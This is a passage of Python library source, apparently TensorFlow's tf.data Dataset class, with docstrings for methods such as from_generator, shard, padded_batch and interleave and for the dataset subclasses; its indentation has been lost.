del self._iterators[iterator_id]
@staticmethod
def from_generator(generator, output_types, output_shapes=None):
"""Creates a `Dataset` whose elements are generated by `generator`.
The `generator` argument must be a callable object that returns
an object that support the `iter()` protocol (e.g. a generator function).
The elements generated by `generator` must be compatible with the given
`output_types` and (optional) `output_shapes` arguments.
For example:
```python
import itertools
def gen():
for i in itertools.count(1):
yield (i, [1] * i)
ds = Dataset.from_generator(
gen, (tf.int64, tf.int64), (tf.TensorShape([]), tf.TensorShape([None])))
value = ds.make_one_shot_iterator().get_next()
sess.run(value) # (1, array([1]))
sess.run(value) # (2, array([1, 1]))
```
Args:
generator: A callable object that takes no arguments and returns an
object that supports the `iter()` protocol.
output_types: A nested structure of `tf.DType` objects corresponding to
each component of an element yielded by `generator`.
output_shapes: (Optional.) A nested structure of `tf.TensorShape`
objects corresponding to each component of an element yielded by
`generator`.
Returns:
A `Dataset`.
"""
if not callable(generator):
raise TypeError("`generator` must be callable.")
if output_shapes is None:
output_shapes = nest.map_structure(
lambda _: tensor_shape.TensorShape(None), output_types)
else:
output_shapes = nest.map_structure_up_to(
output_types, tensor_shape.as_shape, output_shapes)
flattened_types = nest.flatten(output_types)
flattened_shapes = nest.flatten(output_shapes)
generator_state = Dataset._GeneratorState(generator)
def get_iterator_id_map_fn(unused_dummy):
"""Creates a unique `iterator_id` for each pass over the dataset.
The "iterator_id" disambiguates between multiple concurrently
existing iterators.
Args:
unused_dummy: Ignored value.
Returns:
A `tf.int64` tensor whose value uniquely identifies an iterator in
`generator_state`.
"""
return script_ops.py_func(
generator_state.get_next_id, [], dtypes.int64, stateful=True)
def generator_map_fn(iterator_id_t):
"""Generates the next element from iterator with ID `iterator_id_t`.
We map this function across an infinite repetition of the
`iterator_id_t`, and raise `StopIteration` to terminate the iteration.
Args:
iterator_id_t: A `tf.int64` tensor whose value uniquely identifies
the iterator in `generator_state` from which to generate an element.
Returns:
A nested structure of tensors representing an element from the iterator.
"""
def generator_py_func(iterator_id):
"""A `py_func` that will be called to invoke the iterator."""
try:
values = next(generator_state.get_iterator(iterator_id))
except StopIteration:
generator_state.iterator_completed(iterator_id)
raise StopIteration("Iteration finished.")
# Use the same _convert function from the py_func() implementation to
# convert the returned values to arrays early, so that we can inspect
# their values.
# pylint: disable=protected-access
ret_arrays = [
script_ops.FuncRegistry._convert(ret, dtype=dtype.as_numpy_dtype)
for ret, dtype in zip(
nest.flatten_up_to(output_types, values), flattened_types)
]
# pylint: enable=protected-access
# Additional type and shape checking to ensure that the components
# of the generated element match the `output_types` and `output_shapes`
# arguments.
for (ret_array, expected_dtype, expected_shape) in zip(
ret_arrays, flattened_types, flattened_shapes):
if ret_array.dtype != expected_dtype.as_numpy_dtype:
raise TypeError(
"`generator` yielded an element of type %s where an element "
"of type %s was expected." % (ret_array.dtype,
expected_dtype.as_numpy_dtype))
if not expected_shape.is_compatible_with(ret_array.shape):
raise ValueError(
"`generator` yielded an element of shape %s where an element "
"of shape %s was expected." % (ret_array.shape, expected_shape))
return ret_arrays
flat_values = script_ops.py_func(
generator_py_func, [iterator_id_t], flattened_types, stateful=True)
# The `py_func()` op drops the inferred shapes, so we add them back in
# here.
if output_shapes is not None:
for ret_t, shape in zip(flat_values, flattened_shapes):
ret_t.set_shape(shape)
return nest.pack_sequence_as(output_types, flat_values)
# This function associates each traversal of `generator` with a unique
# iterator ID.
def flat_map_fn(iterator_id_t):
# First, generate an infinite dataset containing the iterator ID repeated
# forever.
repeated_id = Dataset.from_tensors(iterator_id_t).repeat(None)
# The `generator_map_fn` gets the next element from the iterator with the
# relevant ID, and raises StopIteration when that iterator contains no
# more elements.
return repeated_id.map(generator_map_fn)
# A single-element dataset that, each time it is evaluated, contains a
# freshly-generated and unique (for the returned dataset) int64
# ID that will be used to identify the appropriate Python state, which
# is encapsulated in `generator_state`, and captured in
# `get_iterator_id_map_fn`.
dummy = 0
id_dataset = Dataset.from_tensors(dummy).map(get_iterator_id_map_fn)
# A dataset that contains all of the elements generated by a
# single iterator created from `generator`, identified by the
# iterator ID contained in `id_dataset`. Lifting the iteration
# into a flat_map here enables multiple repetitions and/or nested
# versions of the returned dataset to be created, because it forces
# the generation of a new ID for each version.
return id_dataset.flat_map(flat_map_fn)
@staticmethod
def range(*args):
"""Creates a `Dataset` of a step-separated range of values.
For example:
```python
Dataset.range(5) == [0, 1, 2, 3, 4]
Dataset.range(2, 5) == [2, 3, 4]
Dataset.range(1, 5, 2) == [1, 3]
Dataset.range(1, 5, -2) == []
Dataset.range(5, 1) == []
Dataset.range(5, 1, -2) == [5, 3]
```
Args:
*args: follow same semantics as python's xrange.
len(args) == 1 -> start = 0, stop = args[0], step = 1
len(args) == 2 -> start = args[0], stop = args[1], step = 1
len(args) == 3 -> start = args[0], stop = args[1, stop = args[2]
Returns:
A `RangeDataset`.
Raises:
ValueError: if len(args) == 0.
"""
return RangeDataset(*args)
@staticmethod
def zip(datasets):
"""Creates a `Dataset` by zipping together the given datasets.
This method has similar semantics to the built-in `zip()` function
in Python, with the main difference being that the `datasets`
argument can be an arbitrary nested structure of `Dataset` objects.
For example:
```python
# NOTE: The following examples use `{ ... }` to represent the
# contents of a dataset.
a = { 1, 2, 3 }
b = { 4, 5, 6 }
c = { (7, 8), (9, 10), (11, 12) }
d = { 13, 14 }
# The nested structure of the `datasets` argument determines the
# structure of elements in the resulting dataset.
Dataset.zip((a, b)) == { (1, 4), (2, 5), (3, 6) }
Dataset.zip((b, a)) == { (4, 1), (5, 2), (6, 3) }
# The `datasets` argument may contain an arbitrary number of
# datasets.
Dataset.zip((a, b, c)) == { (1, 4, (7, 8)),
(2, 5, (9, 10)),
(3, 6, (11, 12)) }
# The number of elements in the resulting dataset is the same as
# the size of the smallest dataset in `datasets`.
Dataset.zip((a, d)) == { (1, 13), (2, 14) }
```
Args:
datasets: A nested structure of datasets.
Returns:
A `Dataset`.
"""
return ZipDataset(datasets)
def concatenate(self, dataset):
"""Creates a `Dataset` by concatenating given dataset with this dataset.
```python
# NOTE: The following examples use `{ ... }` to represent the
# contents of a dataset.
a = { 1, 2, 3 }
b = { 4, 5, 6, 7 }
# Input dataset and dataset to be concatenated should have same
# nested structures and output types.
# c = { (8, 9), (10, 11), (12, 13) }
# d = { 14.0, 15.0, 16.0 }
# a.concatenate(c) and a.concatenate(d) would result in error.
a.concatenate(b) == { 1, 2, 3, 4, 5, 6, 7 }
```
Args:
dataset: `Dataset` to be concatenated.
Returns:
A `Dataset`.
"""
return ConcatenateDataset(self, dataset)
def prefetch(self, buffer_size):
"""Creates a `Dataset` that prefetches elements from this dataset.
Args:
buffer_size: A `tf.int64` scalar `tf.Tensor`, representing the
maximum number elements that will be buffered when prefetching.
Returns:
A `Dataset`.
"""
return PrefetchDataset(self, buffer_size)
@staticmethod
def list_files(file_pattern):
"""A dataset of all files matching a pattern.
Example:
If we had the following files on our filesystem:
- /path/to/dir/a.txt
- /path/to/dir/b.py
- /path/to/dir/c.py
If we pass "/path/to/dir/*.py" as the directory, the dataset would
produce:
- /path/to/dir/b.py
- /path/to/dir/c.py
Args:
file_pattern: A string or scalar string `tf.Tensor`, representing
the filename pattern that will be matched.
Returns:
A `Dataset` of strings corresponding to file names.
"""
return Dataset.from_tensor_slices(gen_io_ops.matching_files(file_pattern))
def repeat(self, count=None):
"""Repeats this dataset `count` times.
Args:
count: (Optional.) A `tf.int64` scalar `tf.Tensor`, representing the
number of times the elements of this dataset should be repeated. The
default behavior (if `count` is `None` or `-1`) is for the elements to
be repeated indefinitely.
Returns:
A `Dataset`.
"""
return RepeatDataset(self, count)
def _enumerate(self, start=0):
max_value = np.iinfo(dtypes.int64.as_numpy_dtype).max
return Dataset.zip((Dataset.range(start, max_value), self))
def shuffle(self, buffer_size, seed=None, reshuffle_each_iteration=None):
"""Randomly shuffles the elements of this dataset.
Args:
buffer_size: A `tf.int64` scalar `tf.Tensor`, representing the
number of elements from this dataset from which the new
dataset will sample.
seed: (Optional.) A `tf.int64` scalar `tf.Tensor`, representing the
random seed that will be used to create the distribution. See
@{tf.set_random_seed} for behavior.
reshuffle_each_iteration: (Optional.) A boolean, which if true indicates
that the dataset should be pseudorandomly reshuffled each time it is
iterated over. (Defaults to `True`.)
Returns:
A `Dataset`.
"""
return ShuffleDataset(self, buffer_size, seed, reshuffle_each_iteration)
def cache(self, filename=""):
"""Caches the elements in this dataset.
Args:
filename: A `tf.string` scalar `tf.Tensor`, representing the name of a
directory on the filesystem to use for caching tensors in this Dataset.
If a filename is not provided, the dataset will be cached in memory.
Returns:
A `Dataset`.
"""
return CacheDataset(self, filename)
def take(self, count):
"""Creates a `Dataset` with at most `count` elements from this dataset.
Args:
count: A `tf.int64` scalar `tf.Tensor`, representing the number of
elements of this dataset that should be taken to form the new dataset.
If `count` is -1, or if `count` is greater than the size of this
dataset, the new dataset will contain all elements of this dataset.
Returns:
A `Dataset`.
"""
return TakeDataset(self, count)
def skip(self, count):
"""Creates a `Dataset` that skips `count` elements from this dataset.
Args:
count: A `tf.int64` scalar `tf.Tensor`, representing the number
of elements of this dataset that should be skipped to form the
new dataset. If `count` is greater than the size of this
dataset, the new dataset will contain no elements. If `count`
is -1, skips the entire dataset.
Returns:
A `Dataset`.
"""
return SkipDataset(self, count)
def shard(self, num_shards, index):
"""Creates a `Dataset` that includes only 1/`num_shards` of this dataset.
This dataset operator is very useful when running distributed training, as
it allows each worker to read a unique subset.
When reading a single input file, you can skip elements as follows:
```python
d = tf.data.TFRecordDataset(FLAGS.input_file)
d = d.shard(FLAGS.num_workers, FLAGS.worker_index)
d = d.repeat(FLAGS.num_epochs)
d = d.shuffle(FLAGS.shuffle_buffer_size)
d = d.map(parser_fn, num_parallel_calls=FLAGS.num_map_threads)
```
Important caveats:
- Be sure to shard before you use any randomizing operator (such as
shuffle).
- Generally it is best if the shard operator is used early in the dataset
pipeline. For example, when reading from a set of TFRecord files, shard
before converting the dataset to input samples. This avoids reading every
file on every worker. The following is an example of an efficient
sharding strategy within a complete pipeline:
```python
d = Dataset.list_files(FLAGS.pattern)
d = d.shard(FLAGS.num_workers, FLAGS.worker_index)
d = d.repeat(FLAGS.num_epochs)
d = d.shuffle(FLAGS.shuffle_buffer_size)
d = d.repeat()
d = d.interleave(tf.data.TFRecordDataset,
cycle_length=FLAGS.num_readers, block_length=1)
d = d.map(parser_fn, num_parallel_calls=FLAGS.num_map_threads)
```
Args:
num_shards: A `tf.int64` scalar `tf.Tensor`, representing the number of
shards operating in parallel.
index: A `tf.int64` scalar `tf.Tensor`, representing the worker index.
Returns:
A `Dataset`.
Raises:
ValueError: if `num_shards` or `index` are illegal values. Note: error
checking is done on a best-effort basis, and aren't guaranteed to be
caught upon dataset creation. (e.g. providing in a placeholder tensor
bypasses the early checking, and will instead result in an error during
a session.run call.)
"""
num_shards = ops.convert_to_tensor(
num_shards, name="num_shards", dtype=dtypes.int64)
num_shards_static = tensor_util.constant_value(num_shards)
index = ops.convert_to_tensor(index, name="index", dtype=dtypes.int64)
index_static = tensor_util.constant_value(index)
if num_shards_static is not None and num_shards_static < 1:
raise ValueError("num_shards must be >= 1; got: %s" % num_shards_static)
if index_static is not None and index_static < 0:
raise ValueError("index must be >= 0; got: %s" % index_static)
if (index_static is not None and num_shards_static is not None and
index_static >= num_shards_static):
raise ValueError("index must be <= num_shards; %s is not < %s" %
(index_static, num_shards_static))
def filter_fn(elem_index, _):
mod_result = math_ops.mod(elem_index, num_shards)
return math_ops.equal(mod_result, index)
return self._enumerate().filter(filter_fn).map(lambda _, elem: elem)
def batch(self, batch_size):
"""Combines consecutive elements of this dataset into batches.
Args:
batch_size: A `tf.int64` scalar `tf.Tensor`, representing the number of
consecutive elements of this dataset to combine in a single batch.
Returns:
A `Dataset`.
"""
return BatchDataset(self, batch_size)
def padded_batch(self, batch_size, padded_shapes, padding_values=None):
"""Combines consecutive elements of this dataset into padded batches.
Like `Dataset.dense_to_sparse_batch()`, this method combines
multiple consecutive elements of this dataset, which might have
different shapes, into a single element. The tensors in the
resulting element have an additional outer dimension, and are
padded to the respective shape in `padded_shapes`.
Args:
batch_size: A `tf.int64` scalar `tf.Tensor`, representing the number of
consecutive elements of this dataset to combine in a single batch.
padded_shapes: A nested structure of `tf.TensorShape` or
`tf.int64` vector tensor-like objects representing the shape
to which the respective component of each input element should
be padded prior to batching. Any unknown dimensions
(e.g. `tf.Dimension(None)` in a `tf.TensorShape` or `-1` in a
tensor-like object) will be padded to the maximum size of that
dimension in each batch.
padding_values: (Optional.) A nested structure of scalar-shaped
`tf.Tensor`, representing the padding values to use for the
respective components. Defaults are `0` for numeric types and
the empty string for string types.
Returns:
A `Dataset`.
"""
return PaddedBatchDataset(self, batch_size, padded_shapes, padding_values)
def map(self, map_func, num_parallel_calls=None):
"""Maps `map_func` across this datset.
Args:
map_func: A function mapping a nested structure of tensors (having
shapes and types defined by `self.output_shapes` and
`self.output_types`) to another nested structure of tensors.
num_parallel_calls: (Optional.) A `tf.int32` scalar `tf.Tensor`,
representing the number elements to process in parallel. If not
specified, elements will be processed sequentially.
Returns:
A `Dataset`.
"""
if num_parallel_calls is None:
return MapDataset(self, map_func)
else:
return ParallelMapDataset(self, map_func, num_parallel_calls)
def flat_map(self, map_func):
"""Maps `map_func` across this dataset and flattens the result.
Args:
map_func: A function mapping a nested structure of tensors (having shapes
and types defined by `self.output_shapes` and `self.output_types`) to a
`Dataset`.
Returns:
A `Dataset`.
"""
return FlatMapDataset(self, map_func)
def interleave(self, map_func, cycle_length, block_length=1):
"""Maps `map_func` across this dataset, and interleaves the results.
For example, you can use `Dataset.interleave()` to process many input files
concurrently:
```python
# Preprocess 4 files concurrently, and interleave blocks of 16 records from
# each file.
filenames = ["/var/data/file1.txt", "/var/data/file2.txt", ..."]
dataset = (Dataset.from_tensor_slices(filenames)
.interleave(lambda x:
TextLineDataset(x).map(parse_fn, num_parallel_calls=1),
cycle_length=4, block_length=16))
```
The `cycle_length` and `block_length` arguments control the order in which
elements are produced. `cycle_length` controls the number of input elements
that are processed concurrently. If you set `cycle_length` to 1, this
transformation will handle one input element at a time, and will produce
identical results = to @{tf.data.Dataset.flat_map}. In general,
this transformation will apply `map_func` to `cycle_length` input elements,
open iterators on the returned `Dataset` objects, and cycle through them
producing `block_length` consecutive elements from each iterator, and
consuming the next input element each time it reaches the end of an
iterator.
For example:
```python
# NOTE: The following examples use `{ ... }` to represent the
# contents of a dataset.
a = { 1, 2, 3, 4, 5 }
# NOTE: New lines indicate "block" boundaries.
a.interleave(lambda x: Dataset.from_tensors(x).repeat(6),
cycle_length=2, block_length=4) == {
1, 1, 1, 1,
2, 2, 2, 2,
1, 1,
2, 2,
3, 3, 3, 3,
4, 4, 4, 4,
3, 3,
4, 4,
5, 5, 5, 5,
5, 5,
}
```
NOTE: The order of elements yielded by this transformation is
deterministic, as long as `map_func` is a pure function. If
`map_func` contains any stateful operations, the order in which
that state is accessed is undefined.
Args:
map_func: A function mapping a nested structure of tensors (having shapes
and types defined by `self.output_shapes` and `self.output_types`) to a
`Dataset`.
cycle_length: The number of elements from this dataset that will be
processed concurrently.
block_length: The number of consecutive elements to produce from each
input element before cycling to another input element.
Returns:
A `Dataset`.
"""
return InterleaveDataset(self, map_func, cycle_length, block_length)
def filter(self, predicate):
"""Filters this dataset according to `predicate`.
Args:
predicate: A function mapping a nested structure of tensors (having shapes
and types defined by `self.output_shapes` and `self.output_types`) to a
scalar `tf.bool` tensor.
Returns:
A `Dataset`.
"""
return FilterDataset(self, predicate)
def apply(self, transformation_func):
"""Apply a transformation function to this dataset.
`apply` enables chaining of custom `Dataset` transformations, which are
represented as functions that take one `Dataset` argument and return a
transformed `Dataset`.
For example:
```
dataset = (dataset.map(lambda x: x ** 2)
.apply(group_by_window(key_func, reduce_func, window_size))
.map(lambda x: x ** 3))
```
Args:
transformation_func: A function that takes one `Dataset` argument and
returns a `Dataset`.
Returns:
The `Dataset` returned by applying `transformation_func` to this dataset.
"""
dataset = transformation_func(self)
if not isinstance(dataset, Dataset):
raise TypeError("`transformation_func` must return a Dataset.")
return dataset
class TensorDataset(Dataset):
"""A `Dataset` with a single element, viz. a nested structure of tensors."""
def __init__(self, tensors):
"""See `Dataset.from_tensors()` for details."""
super(TensorDataset, self).__init__()
with ops.name_scope("tensors"):
self._tensors = nest.pack_sequence_as(tensors, [
ops.convert_to_tensor(t, name="component_%d" % i)
for i, t in enumerate(nest.flatten(tensors))
])
def _as_variant_tensor(self):
return gen_dataset_ops.tensor_dataset(
nest.flatten(self._tensors),
output_shapes=nest.flatten(self.output_shapes))
@property
def output_shapes(self):
return nest.pack_sequence_as(self._tensors,
[t.shape for t in nest.flatten(self._tensors)])
@property
def output_types(self):
return nest.pack_sequence_as(self._tensors,
[t.dtype for t in nest.flatten(self._tensors)])
class TensorSliceDataset(Dataset):
"""A `Dataset` of slices from a nested structure of tensors."""
def __init__(self, tensors):
"""See `Dataset.from_tensor_slices()` for details."""
super(TensorSliceDataset, self).__init__()
with ops.name_scope("tensors"):
flat_tensors = [
ops.convert_to_tensor(t, name="component_%d" % i)
for i, t in enumerate(nest.flatten(tensors))
]
self._tensors = nest.pack_sequence_as(tensors, flat_tensors)
batch_dim = flat_tensors[0].get_shape()[0]
for t in flat_tensors[1:]:
batch_dim.assert_is_compatible_with(t.get_shape()[0])
def _as_variant_tensor(self):
return gen_dataset_ops.tensor_slice_dataset(
nest.flatten(self._tensors),
output_shapes=nest.flatten(self.output_shapes))
@property
def output_shapes(self):
return nest.pack_sequence_as(self._tensors, [
tensor_shape.TensorShape(t.shape[1:])
for t in nest.flatten(self._tensors)
])
@property
def output_types(self):
return nest.pack_sequence_as(self._tensors,
[t.dtype for t in nest.flatten(self._tensors)])
class SparseTensorSliceDataset(Dataset):
"""A `Dataset` that splits a rank-N `tf.SparseTensor` into its rows."""
def __init__(self, sparse_tensor):
"""See `Dataset.from_sparse_tensor_slices()` for details."""
super(SparseTensorSliceDataset, self).__init__()
if not isinstance(sparse_tensor, sparse_tensor_lib.SparseTensor):
raise TypeError("`sparse_tensor` must be a `tf.SparseTensor` object.")
self._sparse_tensor = sparse_tensor
def _as_variant_tensor(self):
return gen_dataset_ops.sparse_tensor_slice_dataset(
self._sparse_tensor.indices, self._sparse_tensor.values,
self._sparse_tensor.dense_shape)
@property
def output_shapes(self):
indices_shape = self._sparse_tensor.indices.get_shape()
shape_shape = self._sparse_tensor.dense_shape.get_shape()
rank = (indices_shape[1] - 1).merge_with(shape_shape[0] - 1)
num_values = tensor_shape.Dimension(None)
return (tensor_shape.TensorShape([num_values, rank]),
tensor_shape.TensorShape([num_values]),
tensor_shape.TensorShape([rank]))
@property
def output_types(self):
return (dtypes.int64, self._sparse_tensor.dtype, dtypes.int64)
class ZipDataset(Dataset):
"""A `Dataset` that zips its inputs together."""
def __init__(self, datasets):
"""See `Dataset.zip()` for details."""
super(ZipDataset, self).__init__()
for ds in nest.flatten(datasets):
if not isinstance(ds, Dataset):
if isinstance(ds, list):
message = ("The argument to `Dataset.zip()` must be a nested "
"structure of `Dataset` objects. Nested structures do not "
"support Python lists; please use a tuple instead.")
else:
message = ("The argument to `Dataset.zip()` must be a nested "
"structure of `Dataset` objects.")
raise TypeError(message)
self._datasets = datasets
def _as_variant_tensor(self):
# pylint: disable=protected-access
return gen_dataset_ops.zip_dataset(
[ds._as_variant_tensor() for ds in nest.flatten(self._datasets)],
output_shapes=[
s
for ds in nest.flatten(self._datasets)
for s in nest.flatten(ds.output_shapes)
],
output_types=[
t
for ds in nest.flatten(self._datasets)
for t in nest.flatten(ds.output_types)
])
# pylint: enable=protected-access
@property
def output_shapes(self):
return nest.pack_sequence_as(
self._datasets,
[ds.output_shapes for ds in nest.flatten(self._datasets)])
@property
def output_types(self):
return nest.pack_sequence_as(
self._datasets,
[ds.output_types for ds in nest.flatten(self._datasets)])
class ConcatenateDataset(Dataset):
"""A `Dataset` that concatenates its input with given dataset."""
def __init__(self, input_dataset, dataset_to_concatenate):
"""See `Dataset.concatenate()` for details."""
super(ConcatenateDataset, self).__init__()
self._input_dataset = input_dataset
self._dataset_to_concatenate = dataset_to_concatenate
nest.assert_same_structure(input_dataset.output_types,
dataset_to_concatenate.output_types)
for a, b in zip(
nest.flatten(input_dataset.output_types),
nest.flatten(dataset_to_concatenate.output_types)):
if a != b:
raise TypeError(
"Two datasets to concatenate have different types %s and %s" %
(input_dataset.output_types, dataset_to_concatenate.output_types))
def _as_variant_tensor(self):
# pylint: disable=protected-access
return gen_dataset_ops.concatenate_dataset(
self._input_dataset._as_variant_tensor(),
self._dataset_to_concatenate._as_variant_tensor(),
output_shapes=nest.flatten(self.output_shapes),
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)))
# pylint: enable=protected-access
@property
def output_shapes(self):
return nest.pack_sequence_as(self._input_dataset.output_shapes, [
ts1.most_specific_compatible_shape(ts2)
for (ts1, ts2) in zip(
nest.flatten(self._input_dataset.output_shapes),
nest.flatten(self._dataset_to_concatenate.output_shapes))
])
@property
def output_types(self):
return self._input_dataset.output_types
class RepeatDataset(Dataset):
"""A `Dataset` that repeats its input several times."""
def __init__(self, input_dataset, count):
"""See `Dataset.repeat()` for details."""
super(RepeatDataset, self).__init__()
self._input_dataset = input_dataset
if count is None:
self._count = constant_op.constant(-1, dtype=dtypes.int64, name="count")
else:
self._count = ops.convert_to_tensor(
count, dtype=dtypes.int64, name="count")
def _as_variant_tensor(self):
return gen_dataset_ops.repeat_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
count=self._count,
output_shapes=nest.flatten(self.output_shapes),
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)))
@property
def output_shapes(self):
return self._input_dataset.output_shapes
@property
def output_types(self):
return self._input_dataset.output_types
class RangeDataset(Dataset):
"""A `Dataset` of a step separated range of values."""
def __init__(self, *args):
"""See `Dataset.range()` for details."""
super(RangeDataset, self).__init__()
self._parse_args(*args)
def _parse_args(self, *args):
if len(args) == 1:
self._start = self._build_tensor(0, "start")
self._stop = self._build_tensor(args[0], "stop")
self._step = self._build_tensor(1, "step")
elif len(args) == 2:
self._start = self._build_tensor(args[0], "start")
self._stop = self._build_tensor(args[1], "stop")
self._step = self._build_tensor(1, "step")
elif len(args) == 3:
self._start = self._build_tensor(args[0], "start")
self._stop = self._build_tensor(args[1], "stop")
self._step = self._build_tensor(args[2], "step")
else:
raise ValueError("Invalid arguments to RangeDataset: %s" % str(args))
def _build_tensor(self, int64_value, name):
return ops.convert_to_tensor(int64_value, dtype=dtypes.int64, name=name)
def _as_variant_tensor(self):
return gen_dataset_ops.range_dataset(
start=self._start,
stop=self._stop,
step=self._step,
output_shapes=nest.flatten(self.output_shapes),
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)))
@property
def output_shapes(self):
return tensor_shape.scalar()
@property
def output_types(self):
return dtypes.int64
class CacheDataset(Dataset):
"""A `Dataset` that caches elements of its input."""
def __init__(self, input_dataset, filename):
"""See `Dataset.cache()` for details."""
super(CacheDataset, self).__init__()
self._input_dataset = input_dataset
self._filename = ops.convert_to_tensor(
filename, dtype=dtypes.string, name="filename")
def _as_variant_tensor(self):
return gen_dataset_ops.cache_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
filename=self._filename,
output_shapes=nest.flatten(self.output_shapes),
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)))
@property
def output_shapes(self):
return self._input_dataset.output_shapes
@property
def output_types(self):
return self._input_dataset.output_types
class ShuffleDataset(Dataset):
"""A `Dataset` that randomly shuffles the elements of its input."""
def __init__(self,
input_dataset,
buffer_size,
seed=None,
reshuffle_each_iteration=None):
"""See `Dataset.shuffle()` for details."""
super(ShuffleDataset, self).__init__()
self._input_dataset = input_dataset
self._buffer_size = ops.convert_to_tensor(
buffer_size, dtype=dtypes.int64, name="buffer_size")
seed, seed2 = random_seed.get_seed(seed)
if seed is None:
self._seed = constant_op.constant(0, dtype=dtypes.int64, name="seed")
else:
self._seed = ops.convert_to_tensor(seed, dtype=dtypes.int64, name="seed")
if seed2 is None:
self._seed2 = constant_op.constant(0, dtype=dtypes.int64, name="seed2")
else:
self._seed2 = ops.convert_to_tensor(
seed2, dtype=dtypes.int64, name="seed2")
if reshuffle_each_iteration is None:
self._reshuffle_each_iteration = True
else:
self._reshuffle_each_iteration = reshuffle_each_iteration
def _as_variant_tensor(self):
return gen_dataset_ops.shuffle_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
buffer_size=self._buffer_size,
seed=self._seed,
seed2=self._seed2,
reshuffle_each_iteration=self._reshuffle_each_iteration,
output_shapes=nest.flatten(self.output_shapes),
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)))
@property
def output_shapes(self):
return self._input_dataset.output_shapes
@property
def output_types(self):
return self._input_dataset.output_types
class TakeDataset(Dataset):
"""A `Dataset` containing the first `count` elements from its input."""
def __init__(self, input_dataset, count):
"""See `Dataset.take()` for details."""
super(TakeDataset, self).__init__()
self._input_dataset = input_dataset
self._count = ops.convert_to_tensor(count, dtype=dtypes.int64, name="count")
def _as_variant_tensor(self):
return gen_dataset_ops.take_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
count=self._count,
output_shapes=nest.flatten(self.output_shapes),
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)))
@property
def output_shapes(self):
return self._input_dataset.output_shapes
@property
def output_types(self):
return self._input_dataset.output_types
class SkipDataset(Dataset):
"""A `Dataset` skipping the first `count` elements from its input."""
def __init__(self, input_dataset, count):
"""See `Dataset.skip()` for details."""
super(SkipDataset, self).__init__()
self._input_dataset = input_dataset
self._count = ops.convert_to_tensor(count, dtype=dtypes.int64, name="count")
def _as_variant_tensor(self):
return gen_dataset_ops.skip_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
count=self._count,
output_shapes=nest.flatten(self.output_shapes),
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)))
@property
def output_shapes(self):
return self._input_dataset.output_shapes
@property
def output_types(self):
return self._input_dataset.output_types
class BatchDataset(Dataset):
"""A `Dataset` that batches contiguous elements from its input."""
def __init__(self, input_dataset, batch_size):
"""See `Dataset.batch()` for details."""
super(BatchDataset, self).__init__()
if sparse.any_sparse(input_dataset.output_types):
# TODO(b/63669786): support batching of sparse tensors
raise TypeError("Batching of sparse tensors is not currently supported")
self._input_dataset = input_dataset
self._batch_size = ops.convert_to_tensor(
batch_size, dtype=dtypes.int64, name="batch_size")
def _as_variant_tensor(self):
return gen_dataset_ops.batch_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
batch_size=self._batch_size,
output_shapes=nest.flatten(self.output_shapes),
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)))
@property
def output_shapes(self):
input_shapes = self._input_dataset.output_shapes
return nest.pack_sequence_as(input_shapes, [
tensor_shape.vector(None).concatenate(s)
for s in nest.flatten(self._input_dataset.output_shapes)
])
@property
def output_types(self):
return self._input_dataset.output_types
def _partial_shape_to_tensor(shape_like):
try:
# First attempt to convert the input to a shape, and return the
# "canonical" tensor representation, which uses `-1` in place of
# `None`.
shape_like = tensor_shape.as_shape(shape_like)
return ops.convert_to_tensor(
[dim if dim is not None else -1 for dim in shape_like.as_list()],
dtype=dtypes.int64)
except (TypeError, ValueError):
# The argument was not trivially convertible to a
# `tf.TensorShape`, so fall back on the conversion to tensor
# machinery.
return ops.convert_to_tensor(shape_like, dtype=dtypes.int64)
def _padding_value_to_tensor(value, output_type):
"""Converts the padding value to a tensor.
Args:
value: The padding value.
output_type: Its expected dtype.
Returns:
A scalar `Tensor`.
Raises:
ValueError: if the padding value is not a scalar.
TypeError: if the padding value's type does not match `output_type`.
"""
value = ops.convert_to_tensor(value, name="padding_value")
if not value.shape.is_compatible_with(tensor_shape.scalar()):
raise ValueError("Padding value should be a scalar, but is not: %s" % value)
if value.dtype != output_type:
raise TypeError("Padding value tensor (%s) does not match output type: %s" %
(value, output_type))
return value
class PaddedBatchDataset(Dataset):
"""A `Dataset` that batches and pads contiguous elements from its input."""
def __init__(self, input_dataset, batch_size, padded_shapes, padding_values):
"""See `Dataset.batch()` for details."""
super(PaddedBatchDataset, self).__init__()
if sparse.any_sparse(input_dataset.output_types):
# TODO(b/63669786): support batching of sparse tensors
raise TypeError("Batching of sparse tensors is not currently supported")
self._input_dataset = input_dataset
self._batch_size = ops.convert_to_tensor(
batch_size, dtype=dtypes.int64, name="batch_size")
padding_values = (
padding_values
if padding_values is not None else self._default_padding(input_dataset))
self._padded_shapes = nest.map_structure_up_to(
input_dataset.output_shapes, _partial_shape_to_tensor, padded_shapes)
self._padding_values = nest.map_structure_up_to(
input_dataset.output_shapes, _padding_value_to_tensor, padding_values,
input_dataset.output_types)
def _default_padding(self, input_dataset):
def make_zero(t):
if t.base_dtype == dtypes.string:
return ""
else:
return np.zeros_like(t.as_numpy_dtype())
return nest.map_structure(make_zero, input_dataset.output_types)
def _as_variant_tensor(self):
return gen_dataset_ops.padded_batch_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
batch_size=self._batch_size,
padded_shapes=[
ops.convert_to_tensor(s, dtype=dtypes.int64)
for s in nest.flatten(self._padded_shapes)
],
padding_values=nest.flatten(self._padding_values),
output_shapes=nest.flatten(self.output_shapes))
@property
def output_shapes(self):
def _padded_shape_to_batch_shape(s):
return tensor_shape.vector(None).concatenate(
tensor_util.constant_value_as_shape(s))
return nest.map_structure(_padded_shape_to_batch_shape, self._padded_shapes)
@property
def output_types(self):
return self._input_dataset.output_types
def _should_unpack_args(args):
"""Returns `True` if `args` should be `*args` when passed to a callable."""
